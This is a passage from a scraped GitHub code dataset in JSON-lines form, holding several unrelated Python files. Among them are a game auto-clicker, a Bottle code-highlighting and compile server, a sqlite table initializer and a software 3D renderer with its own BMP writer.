sqlfmt.setObject(3, \"CG_ASSETMOVERESTRICTION\", \"TOLOCATIONTYPE\", loc.getString(\"TYPE\"))\n            sqlfmt.setObject(4, \"CG_ASSETMOVERESTRICTION\", \"ASSETSTATUS\", mbo.getString(\"STATUS\"))\n\n            \n            mboSetMoveRestriction = mbo.getMboSet(\"$moverestriction\", \"CG_ASSETMOVERESTRICTION\", sqlfmt.format())\n            if mboSetMoveRestriction.count() > 0 :\n                setError()","repo_name":"git786hub/Dynatrace_python","sub_path":"src/CG_MOVEASSET.py","file_name":"CG_MOVEASSET.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16309297122","text":"import time\nfrom __init__ import *\n\ndef main():\n    ark = Arknights()\n    farming = False\n    start = None\n    while(1):\n        type, reg = ark.detect_screen(\"seaborn\")\n        if(type != None):\n            if(not farming):\n                print(type, reg)\n            if(type in [\"start\", \"mission_start\", \"finish\"]):\n                farming = False\n                ark.touch(reg)\n            if(type in [\"farming\"]):\n                farming = True\n                ark.sleep(1)\n        ark.sleep(1)\n\nif __name__ == 
'__main__':\n\tmain()","repo_name":"eruchii/ArkModule","sub_path":"test_auto_detect.py","file_name":"test_auto_detect.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24466582311","text":"import os\nfrom bottle import get,post,request,template,static_file,run\nimport pygmentsColorer\nimport fileoperation\nimport compileandrun\n\nlanglist = pygmentsColorer.getLexers()\nstylelist = pygmentsColorer.getStyles()\n\n@get('/')\ndef getindex():\n\treturn template('index', langtypes=langlist,styles=stylelist);\n\n@get('/filelist.json')\ndef getfilelist():\n\tcodefilelist = fileoperation.getFilelist()\n\tcodefilelist.sort()\n\tcodelistJson={}\n\tindex = 0\n\tfor codefile in codefilelist:\n\t\tcodelistJson[index]=codefile\n\t\tindex += 1\n\treturn codelistJson\n@post('/getfilecontent')\ndef getFilecontent():\n\treturn pygmentsColorer.getColorfilecontent(request.forms.get('codefilename'))\n\n@post('/')\ndef postindex():\n\tlang=request.forms.get('lang')\n\tstyle=request.forms.get('style')\n\tcode = \"\"\n\tif request.files:\n\t\tcode = request.files.codefile.file.read()\n\t\tif request.forms.get('save'):\n\t\t\tfilename = request.files.codefile.filename\n\t\t\tfileoperation.saveFile(filename, code)\n\t\trequest.files.codefile.file.write(\"\")\n\telse:\n\t\tcode=request.forms.get('code')\n\treturn pygmentsColorer.getColorCode(code, lang, style)\n\n@post('/compilesourcecode')\ndef compileSourceCode():\n\tsourcecode=request.forms.get('sourcecode')\n\tlangtype = request.forms.get('langtype')\n\treturn compileandrun.compilerunCode(sourcecode, langtype)\n\n@get('/static/')\ndef server_static(filename):\n\treturn static_file(filename,root=os.getcwd()+'/static')\n\n# debug=True\n# In debug mode, Bottle is much more verbose and provides helpful debugging information\n# whenever an error occurs. It also disables optimisations that might get in your way\n# Here is an incomplete list of things that change in debug mode:\n# The default error page shows a traceback.\n# Templates are not cached\n# Plugins are applied immediately\n#\n# Just make sure to not use the debug mode on a production server.\n#\n# Bottle runs on the built-in wsgiref WSGIServer by default. This\n# non-threading HTTP server is perfectly fine for development and\n# early production, but may become a performance bottleneck when \n# server load increases.\n# There are three ways to eliminate this bottleneck:\n#\tUse a multi-threaded or asynchronous HTTP server\n#\tSpread the load between multiple Bottle instances.\n#\tDo both.\n#\n# reloader=True\n# During development, you have to restart the server \n# a lot to test your recent changes. The auto reloader\n# can do this for you. 
Every time you edit a module file,\n# the reloader restarts the server process and loads the\n# newest version of your code.\n#\nrun(host='127.0.0.1', port=8080, debug=True, reloader=True)\n","repo_name":"kitelife/colorfulCode","sub_path":"cc.py","file_name":"cc.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9633895413","text":"# @file:\tpyo3async_test.py\n# @author:\tJacob Xie\n# @date:\t2023/09/08 23:53:40 Friday\n# @brief:\n\nimport logging\nimport asyncio\n\nfrom pyo3async import rust_sleep, rust_log, PA, rust_sleep_print\n\nprint(\"pyo3async test case\")\n\nFORMAT = \"%(levelname)s %(name)s %(asctime)-15s %(filename)s:%(lineno)d %(message)s\"\nlogging.basicConfig(\n level=logging.INFO,\n format=FORMAT,\n handlers=[\n #\n logging.FileHandler(\"debug.log\"),\n logging.StreamHandler(),\n ],\n)\n\nrust_log()\n\n\nasync def py_sleep():\n # must be wrapped in a py async env\n await rust_sleep()\n\n\nasyncio.run(py_sleep())\n\n\npa = PA(1, \"Jacob\", [\"a\", \"b\", \"c\"])\n\nprint(pa.to_json())\n\nprint(pa.key)\nprint(pa.name)\nprint(pa.props)\n\npa.name = \"JacobX\"\nprint(pa.name)\n\npa.props = pa.props + [\"tada\"]\nprint(pa.props)\n\n\nasync def py_sleep_print(secs: int, pa: PA) -> PA:\n return await rust_sleep_print(secs, pa)\n\n\nasync_pa = asyncio.run(py_sleep_print(5, pa))\n\nprint(async_pa.to_json())\n","repo_name":"Jacobbishopxy/jottings","sub_path":"pyo3async/tests/pyo3async_test.py","file_name":"pyo3async_test.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12874005722","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom . 
import views\n\napp_name = 'api'\nurlpatterns = [\n url(r'^$', views.api_root),\n url(r'^dictionaries/$', views.DictionaryListView.as_view(), name='dictionary-list'),\n url(r'^dictionaries/(?P[0-9]+)/$', views.DictionaryDetailView.as_view(), name='dictionary-detail'),\n url(r'^chapters/(?P[0-9]+)/$', views.ChapterDetailView.as_view(), name='chapter-detail'),\n]\n","repo_name":"danielwii/benkyo","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"8930874603","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport sys\nsys.path.append('./src')\nfrom functions import eigprob_solver as EGS\nfrom schwimmbad import MPIPool\nfrom mpi4py import MPI\n\n\nNDIM = 2\nNWALKERS = 24\nMAXITER = 4\nMATSIZE = 2048\nSOLVERS = np.array(['numpy', 'scipy', 'scipy_sparse']) #, 'tensorflow'])\nGLOBAL_COUNTER = 0\n\n\n\ndef log_likelihood(theta, x, y, yerr):\n eigSolver = EGS(solver_name=SOLVERS[0])\n m, b = theta\n model = m * x + b\n sigma2 = yerr ** 2 + model ** 2 * np.exp(2 * np.log(f_true))\n eigSolver.mat = eigSolver.build_sparse_matrix(MATSIZE)\n eigSolver.solver(eigSolver.mat)\n # GLOBAL_COUNTER = GLOBAL_COUNTER + 1\n return -0.5 * np.sum((y - model) ** 2 / sigma2 + np.log(sigma2))\n\n\ndef log_prior(theta):\n m, b = theta\n if -5.0 < m < 0.5 and 0.0 < b < 10.0:\n return 0.0\n return -np.inf\n\n\ndef log_probability(theta, x, y, yerr):\n lp = log_prior(theta)\n if not np.isfinite(lp):\n return -np.inf\n return lp + log_likelihood(theta, x, y, yerr)\n\n\n\nif __name__ == \"__main__\":\n np.random.seed(123)\n GLOBAL_COUNTER = 0\n\n # Choose the \"true\" parameters.\n m_true = -0.9594\n b_true = 4.294\n f_true = 0.534\n\n # Generate some synthetic data from the model.\n N = 50\n x = np.sort(10 * np.random.rand(N))\n yerr = 0.1 + 0.5 * np.random.rand(N)\n y = m_true * x + b_true\n y += np.abs(y * f_true) * np.random.randn(N)\n y += yerr * np.random.randn(N)\n\n x0 = np.linspace(0, 10, 500)\n\n\n theta_init = np.array([m_true, b_true]).reshape(1, NDIM)\n pos = theta_init + 1e-4 * np.random.randn(NWALKERS, NDIM)\n\n with MPIPool() as pool:\n GLOBAL_COUNTER = 0\n comm = MPI.COMM_WORLD\n mpirank = comm.Get_rank()\n print(f\"Process {mpirank:3d}: Running MPI\")\n if not pool.is_master():\n pool.wait()\n sys.exit(0)\n\n sampler = emcee.EnsembleSampler(NWALKERS, NDIM,\n log_probability,\n args=(x, y, yerr),\n pool=pool)\n sampler.run_mcmc(pos, MAXITER, progress=True)\n print(f\"Total count = {GLOBAL_COUNTER}\")\n\n","repo_name":"srijaniiserprinceton/test_eigprob","sub_path":"src/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27894936129","text":"import json\nimport os\nimport sys\nfrom dataclasses import dataclass\nfrom lib2to3.pgen2 import token\nfrom types import TracebackType\nfrom typing import Any, Dict, List\n\nimport yaml\nfrom beet import Context, Function, run_beet\nfrom mecha import (CompilationError, CompilationUnit, DiagnosticError,\n DiagnosticErrorSummary, Mecha, Parser)\nfrom TokenHighlighter import TokenHighlighter\nfrom tokenstream import TokenStream\n\n\n@dataclass\nclass TokenExtractor:\n parser: Parser\n ctx: Context\n\n def __call__(self, stream: TokenStream) -> Any:\n node = self.parser(stream)\n tokens = []\n for t in stream.tokens:\n tokens.append({'type': t.type, 'value': t.value, 'start': 
t.location, 'end': t.end_location})\n \n self.ctx.meta.setdefault(\"tokens\", []).extend(tokens)\n \n return node\n\n\n\ndef setupTokens(ctx: Context, function: str): \n mc = ctx.inject(Mecha)\n # mc.spec.parsers[\"root\"] = TokenExtractor(mc.spec.parsers[\"root\"], ctx)\n # mc.spec.parsers[\"nested_root\"] = TokenExtractor(mc.spec.parsers[\"nested_root\"], ctx)\n \n \n mc.database.current = Function(function)\n \n mc.database[mc.database.current] = CompilationUnit(resource_location=\"dummy:foo\")\n # mc.parse(mc.database.current)\n highlighter = TokenHighlighter()\n highlighter(mc.parse(mc.database.current))\n \n ctx.meta[\"tokens\"] = highlighter.tokens\n \ndef sortByTokenLength(t):\n return t['end'][0] - t['start'][0]\n \ndef grabTokens(function: str, configPath: str):\n # if(sys.argv[2] != None):\n # if(sys.argv[2].endswith('json')):\n # config = json.load(open(sys.argv[2]))\n # elif(sys.argv[2].endswith('yaml')):\n # config = yaml.load(open(sys.argv[2]), Loader=yaml.FullLoader)\n \n # os.chdir(os.path.dirname(sys.argv[2]))\n \n config = {}\n \n if(configPath != ''):\n text = open(configPath, 'r').read()\n config = json.loads(text) if configPath.endswith('json') else yaml.load(text, Loader=yaml.FullLoader)\n if('output' in config):\n config['output'] = None\n os.chdir(os.path.dirname(configPath))\n try:\n with run_beet(config) as ctx:\n setupTokens(ctx, function)\n tokens: List[Dict] = ctx.meta[\"tokens\"] \n # tokens.sort(key=sortByTokenLength, reverse=True)\n return {'status': 'ok', 'tokens': tokens}\n except DiagnosticErrorSummary as e:\n error = ''\n for i in range(len(e.diagnostics.exceptions)):\n execption = e.diagnostics.exceptions[i]\n error += f'-------\\n{type(e)} {i}:\\n{execption.message}'\n \n return {'status': 'error', 'message': error}\n except SyntaxError as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n except ValueError as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n except Exception as e:\n return {'status': 'error', 'message': f'-------\\n{type(e)}:\\n{str(e)}'}\n\nfor line in sys.stdin:\n request = json.loads(line)\n \n if request[\"mode\"] == 'tokens':\n function = request[\"text\"]\n config = request[\"config\"] if 'config' in request else ''\n # sys.stdin.flush()\n print(\"data: \" + json.dumps(grabTokens(function, config)))\n # print(function, config)\n # print(line)\n sys.stdout.flush()","repo_name":"TheNuclearNexus/BeetSemantics","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"1319484744","text":"# Flask app to serve the model\nimport os\nimport sqlite3\nfrom argparse import ArgumentParser\n\n\"\"\"\nUpload to server with (overwrite the database on the server):\ncurl -X POST -F \"file=@database.db\" http://45.76.11.163:8000/upload_database\n\"\"\"\n\nDATABASE = './database.db'\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('--video_dir', default='./public/Results-01-28', help='directory of videos')\n return parser.parse_args()\n\n# return list of mp4 files in the directory\ndef get_video_list(video_dir):\n video_list = []\n for file in os.listdir(video_dir):\n if file.endswith('_action.mp4'):\n video_list.append(file)\n return video_list\n\n\nif __name__ == '__main__':\n # Insert all videos into the database with comment 'Unfinished'\n args = parse_args()\n video_dir = args.video_dir\n video_dir_basename = 
os.path.basename(video_dir)\n    db_path = DATABASE\n    db = sqlite3.connect(db_path)\n    db.cursor().execute(f\"CREATE TABLE '{video_dir_basename}' (video VARCHAR(255), comment VARCHAR(255))\")\n    for video in get_video_list(video_dir):\n        db.cursor().execute(f\"INSERT INTO '{video_dir_basename}' (video, comment) VALUES (?, ?)\", (video, 'Unfinished'))\n    db.commit()","repo_name":"zhifanzhu/web_video_table","sub_path":"tools/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11624468509","text":"# Randy Venegas 18341\n# Computer Graphics \n\nimport struct\nimport random\nfrom obj import Obj, Texture\nfrom collections import namedtuple\nfrom numpy import matrix, cos, sin, tan\n\nV2 = namedtuple('Point2', ['x', 'y'])\nV3 = namedtuple('Point3', ['x', 'y', 'z'])\n\ndef char(input):\n\treturn struct.pack('=c', input.encode('ascii'))\n\ndef word(input):\n\treturn struct.pack('=h', input)\n\ndef dword(input):\n\treturn struct.pack('=l', input)\n\ndef glColor(r, g, b):\n\treturn bytes([b, g, r])\n\ndef cross(v1, v2):\n\treturn V3(\n\t\tv1.y * v2.z - v1.z * v2.y,\n\t\tv1.z * v2.x - v1.x * v2.z,\n\t\tv1.x * v2.y - v1.y * v2.x,\n\t)\n\ndef bbox(*vertices):\n\txs = [ vertex.x for vertex in vertices]\n\tys = [ vertex.y for vertex in vertices]\n\n\txs.sort()\n\tys.sort()\n\n\n\txmin = int(xs[0])\n\tymin = int(ys[0])\n\txmax = int(xs[-1])\n\tymax = int(ys[-1])\n\n\treturn xmin, xmax, ymin, ymax\n\ndef barycentric(A, B, C, P):\n\tcx, cy, cz = cross(\n\t\tV3(C.x - A.x, B.x - A.x, A.x - P.x), \n\t\tV3(C.y - A.y, B.y - A.y, A.y - P.y)\n\t)\n\n\tif abs(cz) < 1:\n\t\treturn -1, -1, -1\n\n\tu = cx/cz\n\tv = cy/cz\n\tw = 1 - (u + v)\n\n\treturn V3(w, v, u)\n\n\ndef sum(v0, v1):\n\treturn V3(v0.x + v1.x, v0.y + v1.y, v0.z + v1.z)\n\ndef sub(v0, v1):\n\treturn V3(v0.x - v1.x, v0.y - v1.y, v0.z - v1.z)\n\ndef mul(v0, k):\n\treturn V3(v0.x * k, v0.y * k, v0.z *k)\n\ndef dot(v0, v1):\n\treturn v0.x * v1.x + v0.y * v1.y + v0.z * v1.z\n\ndef cross(v0, v1):\n\treturn V3(\n\t\tv0.y * v1.z - v0.z * v1.y,\n\t\tv0.z * v1.x - v0.x * v1.z,\n\t\tv0.x * v1.y - v0.y * v1.x,\n\t)\n\ndef length(v0):\n\treturn (v0.x**2 + v0.y**2 + v0.z**2)**0.5\n\ndef norm(v0):\n\n\tv0length = length(v0)\n\n\tif not v0length:\n\t\treturn V3(0, 0, 0)\n\n\treturn V3(v0.x/v0length, v0.y/v0length, v0.z/v0length)\n\nBLACK = glColor(0, 0, 0)\nWHITE = glColor(255, 255, 255)\n\n\nclass Render(object):\n\tdef glInit(self, width, height):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.color = glColor(255, 255, 255)\n\t\tself.clearColor = glColor(0, 0, 0)\n\t\tself.light = V3(0,0,1)\n\t\tself.activeVertexArray = []\n\t\tself.glClear()\n\n\t\tself.zbuffer = [\n\t\t\t[-float('inf') for x in range(self.width)]\n\t\t\tfor y in range(self.height)\n\t\t]\n\n\tdef glColorPoint(self, r, g, b):\n\t\tself.color = glColor(round(r * 255), round(g * 255), round(b * 255))\n\n\tdef glCreateWindow(self, width = 640, height = 480):\n\t\tself.width = width\n\t\tself.height = height\n\n\tdef glClear(self):\n\t\tself.framebuffer = [\n\t\t\t[glColor(0,150,50) for i in range(self.width)]\n\t\t\tfor j in range(self.height)\n\t\t]\n\n\t\tself.zbuffer = [\n\t\t\t[-float('inf') for x in range(self.width)]\n\t\t\tfor y in range(self.height)\n\t\t]\n\n\tdef glClearColor(self, r, g, b):\n\t\tself.clearColor = glColor(round(r * 255), round(g * 255), round(b * 255))\n\t\tself.framebuffer = [\n            [self.clearColor for x in range(self.width)] for y in 
range(self.height)\n ]\n\n\tdef pixel(self, x, y, color):\n\t\ttry:\n\t\t\tself.framebuffer[y%self.height][x%self.width] = color\n\t\texcept:\n\t\t\tpass\n\n\tdef glFinish(self, filename):\n\t\tf = open(filename, 'bw')\n\n\t\tf.write(char('B'))\n\t\tf.write(char('M'))\n\t\tf.write(dword(54 + self.width * self.height * 3))\n\t\tf.write(dword(0))\n\t\tf.write(dword(54))\n\n\t\tf.write(dword(40))\n\t\tf.write(dword(self.width))\n\t\tf.write(dword(self.height))\n\t\tf.write(word(1))\n\t\tf.write(word(24))\n\t\tf.write(dword(0))\n\t\tf.write(dword(self.width * self.height * 3))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\t\tf.write(dword(0))\n\n\t\tfor x in range(self.height):\n\t\t\tfor y in range(self.width):\n\t\t\t\tf.write(self.framebuffer[x][y])\n\n\t\tf.close()\n\n\tdef glLine(self, A, B, color):\n\n\t\tx1 = round(A.x)\n\t\ty1 = round(A.y)\n\t\tx2 = round(B.x)\n\t\ty2 = round(B.y)\n\n\t\tdy = abs(y2 - y1)\n\t\tdx = abs(x2 - x1)\n\t\tsteep = dy > dx\n\n\t\tif steep:\n\t\t x1, y1 = y1, x1\n\t\t x2, y2 = y2, x2\n\n\t\tif x1 > x2:\n\t\t x1, x2 = x2, x1\n\t\t y1, y2 = y2, y1\n\n\t\tdy = abs(y2 - y1)\n\t\tdx = abs(x2 - x1)\n\n\t\toffset = 0\n\t\tthreshold = dx\n\n\t\ty = y1\n\t\tfor x in range(x1, x2 + 1):\n\t\t if steep:\n\t\t self.pixel(y, x, color)\n\t\t else:\n\t\t self.pixel(x, y, color)\n\t\t \n\t\t offset += dy * 2\n\t\t if offset >= threshold:\n\t\t y += 1 if y1 < y2 else -1\n\t\t threshold += dx * 2\n\n\tdef transform(self, vertex):\n\t\taugmented_vertex = [\n\t\t\tvertex.x,\n\t\t\tvertex.y,\n\t\t\tvertex.z,\n\t\t\t1\n\t\t]\n\t\ttranformed_vertex = self.Viewport @ self.Projection @ self.View @ self.Model @ augmented_vertex\n\n\t\ttranformed_vertex = tranformed_vertex.tolist()[0]\n\n\t\ttranformed_vertex = [\n\t\t\t(tranformed_vertex[0]/tranformed_vertex[3]),\n\t\t\t(tranformed_vertex[1]/tranformed_vertex[3]),\n\t\t\t(tranformed_vertex[2]/tranformed_vertex[3])\n\t\t]\n\t\treturn V3(*tranformed_vertex)\n\t \n\n\tdef drawArrays(self, polygonType):\n\t\tif polygonType == 'TRIANGLE':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangle()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'WIREFRAME':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangleWireframe()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'SHADER':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangleShader()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\t\telif polygonType == 'GREYSHADER':\n\t\t\ttry:\n\t\t\t\tcont = 1\n\t\t\t\twhile True:\n\t\t\t\t\tself.triangleGreyShade()\n\t\t\t\t\tprint(\"triangulo: \",cont)\n\t\t\t\t\tcont += 1\n\t\t\texcept StopIteration:\n\t\t\t\tprint(\"done\")\n\n\tdef load(self, filename, translate =(0,0,0), scale=(1,1,1), rotate=(0,0,0)):\n\t\tself.loadModelMatrix(translate, scale, rotate)\n\t\tmodel = Obj(filename)\n\n\t\tvertexBufferObject = []\n\n\t\tfor face in model.faces:\n\n\t\t\tfor facepart in face:\n\n\t\t\t\tvertex = self.transform(V3(*model.vertices[facepart[0]-1]))\n\t\t\t\tvertexBufferObject.append(vertex)\n\n\t\t\t\ttry:\n\t\t\t\t\ttvertex = V3(*model.tvertices[facepart[1]-1])\n\t\t\t\texcept:\n\t\t\t\t\ttvertex = V3(*model.tvertices[facepart[1]-1],0)\n\n\t\t\t\tvertexBufferObject.append(tvertex)\n\n\t\tself.activeVertexArray = 
iter(vertexBufferObject)\n\n\tdef loadModelMatrix(self, translate=(0, 0, 0), scale=(1, 1, 1), rotate=(0, 0, 0)):\n\t\ttranslate = V3(*translate)\n\t\tscale = V3(*scale)\n\t\trotate = V3(*rotate)\n\n\t\ttranslation_matrix = matrix([\n\t\t\t[1, 0, 0, translate.x],\n\t\t\t[0, 1, 0, translate.y],\n\t\t\t[0, 0, 1, translate.z],\n\t\t\t[0, 0, 0, 1],\n\t\t])\n\n\n\t\ta = rotate.x\n\t\trotation_matrix_x = matrix([\n\t\t\t[1, 0, 0, 0],\n\t\t\t[0, cos(a), -sin(a), 0],\n\t\t\t[0, sin(a), cos(a), 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\ta = rotate.y\n\t\trotation_matrix_y = matrix([\n\t\t\t[cos(a), 0, sin(a), 0],\n\t\t\t[ 0, 1, 0, 0],\n\t\t\t[-sin(a), 0, cos(a), 0],\n\t\t\t[ 0, 0, 0, 1]\n\t\t])\n\n\t\ta = rotate.z\n\t\trotation_matrix_z = matrix([\n\t\t\t[cos(a), -sin(a), 0, 0],\n\t\t\t[sin(a), cos(a), 0, 0],\n\t\t\t[0, 0, 1, 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\trotation_matrix = rotation_matrix_x @ rotation_matrix_y @ rotation_matrix_z\n\n\t\tscale_matrix = matrix([\n\t\t\t[scale.x, 0, 0, 0],\n\t\t\t[0, scale.y, 0, 0],\n\t\t\t[0, 0, scale.z, 0],\n\t\t\t[0, 0, 0, 1],\n\t\t])\n\n\t\tself.Model = translation_matrix @ rotation_matrix @ scale_matrix\n\n\tdef loadViewMatrix(self, x, y, z, center):\n\t\tM = matrix([\n\t\t\t[x.x, x.y, x.z, 0],\n\t\t\t[y.x, y.y, y.z, 0],\n\t\t\t[z.x, z.y, z.z, 0],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\tO = matrix([\n\t\t\t[1, 0, 0, -center.x],\n\t\t\t[0, 1, 0, -center.y],\n\t\t\t[0, 0, 1, -center.z],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\t\tself.View = M @ O\n\n\tdef loadProjectionMatrix(self, coeff):\n\t\tself.Projection = matrix([\n\t\t\t[1, 0, 0, 0],\n\t\t\t[0, 1, 0, 0],\n\t\t\t[0, 0, 1, 0],\n\t\t\t[0, 0, coeff, 1]\n\t\t])\n\n\tdef loadViewportMatrix(self, x = 0, y = 0):\n\t\tself.Viewport = matrix([\n\t\t\t[self.width/2, 0, 0, x + self.width/2],\n\t\t\t[0, self.height/2, 0, y + self.height/2],\n\t\t\t[0, 0, 128, 128],\n\t\t\t[0, 0, 0, 1]\n\t\t])\n\n\tdef lookAt(self, eye, center, up):\n\t\tz = norm(sub(eye, center))\n\t\tx = norm(cross(up, z))\n\t\ty = norm(cross(z, x))\n\t\tself.loadViewMatrix(x, y, z, center)\n\t\tself.loadProjectionMatrix(-1 / length(sub(eye, center)))\n\t\tself.loadViewportMatrix()\n\n\tdef shader(self, x, y):\n\n\t\txLevel = x/self.width\n\t\treturn glColor(255,255,255)\t\n\n\tdef triangleShader(self, vertices=(), tvertices=(), texture=None):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\ttx = tA.x * w + tB.x * v + tC.x * u\n\t\t\t\tty = tA.y * w + tB.y * v + tC.y * u\n\n\t\t\t\tcolor = self.shader(x, y)\n\n\t\t\t\tif z > self.zbuffer[x][y]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x][y] = z\n\t\t\n\tdef triangleWireframe(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\tself.glLine(A,B,self.color)\n\t\tself.glLine(B,C,self.color)\n\t\tself.glLine(C,A,self.color)\n\n\tdef triangle(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = 
next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\t\tnormal = norm(cross(sub(B, A), sub(C, A)))\n\t\tintensity = dot(normal, self.light)\n\t\tif intensity < 0:\n\t\t\treturn 0\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\t\t#el punto esta afuera\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\ttx = tA.x * w + tB.x * v + tC.x * u\n\t\t\t\tty = tA.y * w + tB.y * v + tC.y * u\n\t\t\t\t# print (tx, ty)\n\n\t\t\t\tcolor = self.texture.getColor(tx, ty)\n\n\n\t\t\t\tif z > self.zbuffer[x%self.width][y%self.height]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x%self.width][y%self.height] = z\n\n\tdef triangleGreyShade(self):\n\t\tA = next(self.activeVertexArray)\n\t\ttA = next(self.activeVertexArray)\n\t\tB = next(self.activeVertexArray)\n\t\ttB = next(self.activeVertexArray)\n\t\tC = next(self.activeVertexArray)\n\t\ttC = next(self.activeVertexArray)\n\n\t\txmin, xmax, ymin, ymax = bbox(A, B, C)\n\t\tnormal = norm(cross(sub(B, A), sub(C, A)))\n\t\tintensity = dot(normal, self.light)\n\t\tgrey = round((intensity * 255)/20)\n\t\tif intensity < 0:\n\t\t\treturn 0\n\n\t\tfor x in range(xmin, xmax + 1):\n\t\t\tfor y in range(ymin, ymax + 1):\n\t\t\t\tP = V2(x, y)\n\t\t\t\tw, v, u = barycentric(A, B, C, P)\n\t\t\t\tif w < 0 or v < 0 or u < 0:\n\t\t\t\t\t#el punto esta afuera\n\t\t\t\t\tcontinue\n\n\t\t\t\tz = A.z * w + B.z * v + C.z * u\n\n\t\t\t\tcolor = glColor(grey,grey,grey)\n\n\n\t\t\t\tif z > self.zbuffer[x%self.width][y%self.height]:\n\t\t\t\t\tself.pixel(x, y, color)\n\t\t\t\t\tself.zbuffer[x%self.width][y%self.height] = z\n","repo_name":"RandyVen/Proyecto1-Graficas","sub_path":"gl.py","file_name":"gl.py","file_ext":"py","file_size_in_byte":10622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12712925947","text":"# -*- coding: utf-8 -*-\nimport inspect\nfrom functools import wraps\n\n# resource functions (functions making objects)\n# key is the resource name (i.e. \"user\"), value is the dict, containing\n# currently only one key: func: callable object\n\n# It's a global object, because it should be shared between all resource\n# instances\n_resource_makers = {}\n\n\ndef register_func(func):\n \"\"\"\n Decorator to register function as a resource\n \"\"\"\n resource_id = func.__name__\n _resource_makers[resource_id] = {'func': func}\n return func\n\n\nclass ResourceCollectionManager(object):\n\n def __init__(self):\n self._modules = set()\n # resource registry (attributes, available in current context)\n # key is the resource name (i.e. 
